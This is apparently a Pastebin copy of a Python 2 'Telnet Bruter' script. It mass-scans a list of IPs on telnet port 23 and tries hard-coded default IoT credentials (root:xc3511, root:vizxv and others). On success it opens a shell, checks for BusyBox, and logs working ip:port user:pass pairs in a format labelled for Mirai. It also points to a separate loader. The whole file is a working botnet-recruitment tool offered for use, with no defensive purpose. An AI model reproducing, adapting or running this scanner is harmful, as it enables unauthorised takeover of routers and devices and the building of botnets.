SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | # Telnet Bruter v3 *FINAL* | By; LiGhT | |
3 | # Loader: https://pastebin.com/thqXywvQ | |
4 | ||
5 | ||
6 | import threading | |
7 | import sys, os, re, time, socket | |
8 | from Queue import * | |
9 | from sys import stdout | |
10 | ||
11 | if len(sys.argv) < 4: | |
12 | print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>" | |
13 | sys.exit() | |
14 | ||
15 | ips = open(sys.argv[1], "r").readlines() | |
16 | threads = int(sys.argv[2]) | |
17 | output_file = sys.argv[3] | |
18 | queue = Queue() | |
19 | queue_count = 0 | |
20 | ||
21 | combo = [ #use as many passwords as ya want(P.S. The more passwords the slower the bruteforce is going to be) | |
22 | "support:support", | |
23 | "admin:admin", | |
24 | "user:user", | |
25 | "root:antslq", | |
26 | "supervisor:zyad1234", | |
27 | "root:xc3511", | |
28 | "root:vizxv", | |
29 | "root: " | |
30 | ] | |
31 | ||
32 | for ip in ips: | |
33 | queue_count += 1 | |
34 | stdout.write("\r[%d] Added to queue" % queue_count) | |
35 | stdout.flush() | |
36 | queue.put(ip) | |
37 | print "\n" | |
38 | ||
39 | class router(threading.Thread): | |
40 | def __init__ (self, ip): | |
41 | threading.Thread.__init__(self) | |
42 | self.ip = str(ip).rstrip('\n') | |
43 | def run(self): | |
44 | username = "" | |
45 | password = "" | |
46 | for passwd in combo: | |
47 | if ":n/a" in passwd: | |
48 | password="" | |
49 | else: | |
50 | password=passwd.split(":")[1] | |
51 | if "n/a:" in passwd: | |
52 | username="" | |
53 | else: | |
54 | username=passwd.split(":")[0] | |
55 | try: | |
56 | tn = socket.socket() | |
57 | tn.settimeout(8) | |
58 | tn.connect((self.ip,23)) | |
59 | except Exception: | |
60 | tn.close() | |
61 | break | |
62 | try: | |
63 | hoho = '' | |
64 | hoho += readUntil(tn, "ogin:") | |
65 | if "ogin" in hoho: | |
66 | tn.send(username + "\n") | |
67 | time.sleep(0.09) | |
68 | except Exception: | |
69 | tn.close() | |
70 | try: | |
71 | hoho = '' | |
72 | hoho += readUntil(tn, "assword:") | |
73 | if "assword" in hoho: | |
74 | tn.send(password + "\n") | |
75 | time.sleep(0.8) | |
76 | else: | |
77 | pass | |
78 | except Exception: | |
79 | tn.close() | |
80 | try: | |
81 | prompt = '' | |
82 | prompt += tn.recv(40960) | |
83 | if ">" in prompt and "ONT" not in prompt: | |
84 | try: | |
85 | tn.send("cat | sh" + "\n") | |
86 | time.sleep(0.1) | |
87 | success = False | |
88 | timeout = 8 | |
89 | data = ["BusyBox", "Built-in"] | |
90 | tn.send("sh" + "\n") | |
91 | time.sleep(0.01) | |
92 | tn.send("busybox" + "\r\n") | |
93 | buf = '' # NO FALSE POSSITIVES OVA HERE | |
94 | start_time = time.time() | |
95 | while time.time() - start_time < timeout: | |
96 | buf += tn.recv(40960) | |
97 | time.sleep(0.01) | |
98 | for info in data: | |
99 | if info in buf and "unrecognized" not in buf: | |
100 | success = True | |
101 | break | |
102 | except: | |
103 | pass | |
104 | elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt: | |
105 | try: | |
106 | success = False | |
107 | timeout = 8 | |
108 | data = ["BusyBox", "Built-in"] | |
109 | tn.send("sh" + "\n") | |
110 | time.sleep(0.01) | |
111 | tn.send("shell" + "\n") | |
112 | time.sleep(0.01) | |
113 | tn.send("help" + "\n") | |
114 | time.sleep(0.01) | |
115 | tn.send("busybox" + "\r\n") | |
116 | buf = '' # NO FALSE POSSITIVES OVA HERE | |
117 | start_time = time.time() | |
118 | while time.time() - start_time < timeout: | |
119 | buf += tn.recv(40960) | |
120 | time.sleep(0.01) | |
121 | for info in data: | |
122 | if info in buf and "unrecognized" not in buf: | |
123 | success = True | |
124 | break | |
125 | except: | |
126 | pass | |
127 | else: | |
128 | tn.close() | |
129 | if success == True: | |
130 | try: | |
131 | #os.system("echo "+self.ip+" >> "+output_file+"") #1.1.1.1 # bios.txt | |
132 | #os.system("echo "+self.ip+":"+username+":"+password+" >> "+output_file+"") # 1.1.1.1:user:pass # regular | |
133 | os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai | |
134 | print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip) | |
135 | tn.close() | |
136 | break | |
137 | except: | |
138 | tn.close() | |
139 | tn.close() | |
140 | except Exception: | |
141 | tn.close() | |
142 | ||
143 | def readUntil(tn, string, timeout=8): | |
144 | buf = '' | |
145 | start_time = time.time() | |
146 | while time.time() - start_time < timeout: | |
147 | buf += tn.recv(1024) | |
148 | time.sleep(0.01) | |
149 | if string in buf: return buf | |
150 | raise Exception('TIMEOUT!') | |
151 | ||
152 | def worker(): | |
153 | try: | |
154 | while True: | |
155 | try: | |
156 | IP = queue.get() | |
157 | thread = router(IP) | |
158 | thread.start() | |
159 | queue.task_done() | |
160 | time.sleep(0.2) | |
161 | except: | |
162 | pass | |
163 | except: | |
164 | pass | |
165 | ||
166 | for l in xrange(threads): | |
167 | try: | |
168 | t = threading.Thread(target=worker) | |
169 | t.start() | |
170 | time.sleep(0.01) | |
171 | except: | |
172 | pass |